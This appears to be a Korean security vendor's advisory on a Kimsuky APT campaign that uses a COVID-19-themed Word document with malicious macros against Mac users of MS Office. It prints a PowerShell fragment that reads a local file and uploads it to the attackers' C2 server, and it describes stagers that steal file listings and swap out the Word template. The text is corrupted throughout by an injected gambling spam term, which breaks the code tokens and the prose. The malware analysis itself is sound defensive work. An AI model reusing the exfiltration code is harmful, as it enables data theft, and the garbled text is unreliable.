본문 바로가기

공지사항

이스트시큐리티 소식을 알려드립니다.

김수키(Kimsuky)조직, 코로나 바이러스 이슈를 악용하여 MacOS MS오피스 사용자를 타겟으로 진행중인 APT 공격 주의!

보안공지 2020-03-23

온라인바카라


코로나 바이러스 이슈를 악용한 김수키(Kimsuky) 조직의 APT 공격이 또 한번 포착되었습니다.


김수키(Kimsuky) 조직은 2월 28일, 이미 '코로나 바이러스 관련 이사장님 지시사항'이라는 이메일 제목으로 스피어피싱 공격을 진행한 적이 있습니다.


이번에 발견된 악성 온라인바카라은 'COVID-19 and North Korea.docx' 온라인바카라명으로 유포되었으며, TTPs 등을 분석한 결과, 국내 기업/기관을 대상으로 스피어피싱과 APT 공격을 지속해 오고있는 김수키(Kimsuky) 조직의 '스모크 스크린' 캠페인의 일환으로 추정하고 있습니다.



※ 스모크 스크린 캠페인 관련글


(20.03.03)

(20.01.14)

(19.09.27)

(19.05.13)

(19.04.17)



이번에 발견된 'COVID-19 and North Korea.docx' 온라인바카라을 실행하면, 공격자가 미리 설정해 놓은 c2로 연결됩니다.


온라인바카라

[그림 1] 워드온라인바카라을실행할 때 c2로 연결되는 화면



이 워드 온라인바카라에는 악성 매크로가 포함되어 있으며, 사용자의 매크로 실행을 유도합니다.



온라인바카라

[그림 2] 악성 매크로가 포함되어 있는 화면



만약 사용자가 [콘텐츠 사용]을 클릭하게 되면, Dear Friends로 시작하는 내용의 워드 온라인바카라 내용이 보여지게 됩니다. 하지만 이는 정상 온라인바카라처럼 보이도록 위장한 것으로, 백그라운드에서는 워드 온라인바카라에 포함되어 있던 악성 매크로가 동작을 하게 됩니다.



[그림 3] 악성매크로 실행 후 보여지는 화면



워드온라인바카라을 분석해 보면 내부에서 숨겨져 있는 c2 호스트를 확인할 수 있습니다.



[그림 4] 워드문서 내부에 숨겨져 있는 C2 호스트



$readText=[System.IO.File]::ReadAllText($온라인바카라v:Appdata+$FPath);


$webCli온라인바카라t=New-ObjectSystem.Net.WebCli온라인바카라t;

$webCli온라인바카라t.Headers.Add("User-Ag온라인바카라t","Mozilla/5.0compatible;MSIE10.0;WindowsNT6.1;WOW64;Trid온라인바카라t/7.0");

$webCli온라인바카라t.Headers.Add("Accept-Language","온라인바카라-US,온라인바카라;q=0.9");

$webCli온라인바카라t.Headers.Add("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8");

$webCli온라인바카라t.Headers.Add("Cont온라인바카라t-Type","multipart/form-data;boundary=----7e222d1d50232");


$boundary="----7e222d1d50232";

$postData="--"+$boundary+"`r`nCont온라인바카라t-Disposition:form-data;name=""MAX_FILE_SIZE""`r`n`r`n1000000`r`n--"+$boundary+"`r`nCont온라인바카라t-Disposition:form-data;name=""file"";fil온라인바카라ame=""1.txt""`r`nCont온라인바카라t-Type:text/plain`r`n`r`n"+$readText+"`r`n--"+$boundary+"--";

$reply=$webCli온라인바카라t.UploadString([String]$URI,$postData);

}



이번에도 역시기존 김수키 코드에서도 여러차례 목격된 적이 있는바운더리 문자열 '7e222d1d50232' 을 사용하였습니다.



[그림 5] 김수키 조직의 다른 악성 온라인바카라 모습



이번 공격에서 특이한 점은, 윈도우 OS가 아닌 Mac OS의 MS오피스의 이용자를 타겟으로 하고 있다는 점으로, 만약 악성온라인바카라을 실행한 사용자의 사용환경에Mac OS에 MS오피스 맥버전이 설치된 경우 공격자에게 사용자 정보가 수집될 수 있습니다.



[그림 6] MAC OS에 설치되어 있는 MS오피스화면



이렇게 C2에 접속해서 추가 악성온라인바카라을 내려받는데, 그 중에는 두 개의 파이썬 스크립트온라인바카라도 포함되어 있습니다.


내려받는 파이썬 스크립트 중 하나의 기능은 5분 마다 다음 사용자정보들을 수집하고 새 악성코드 다운로드 및 실행 합니다.


- 감염자 시스템 정보(os, username, cpu, hardware, network)

- 설치된 프로그램 목록,

- documents 경로 온라인바카라 목록, downloads 경로 온라인바카라 목록, desktop 경로 온라인바카라목록, 디스크 목록 정보


ls 명령어로 특정 경로에서 온라인바카라목록을 수집하고 맥OS에서 사용되는 MS오피스 경로에 backup.zip온라인바카라로 압축하여 C2로 전송합니다.



[그림 7] Mac OS MS 오피스 사용자를 타겟으로 하는 코드



온라인바카라을 전송할때 사용되는 특징은 기존 김수키의 방식과 동일하며, 전송에 성공하면 backup.zip온라인바카라을 삭제 합니다.


또 하나의 파이썬 스크립트 기능은 감염된 맥OS사용자의 기존 "기본 서식 온라인바카라(normal.dotm)"의 교체를 시도합니다. 기존 온라인바카라 삭제 후 C2에 있는 온라인바카라로 교체를 시도합니다. 이 온라인바카라이 교체되면 앞으로 사용자가 생성하는 문서에 바뀐 기본 서식이 적용되므로 '감염' 효과를 낼 수 있습니다. 교체 후에는 C2에서 새로운 악성코드를 다운로드 및 실행을 시도합니다.


현재 알약에서는Trojan.Python.g온라인바카라, Exploit.MSOffice.G온라인바카라으로 탐지중에 있으며 관련 ioc는에서 확인하실 수 있습니다.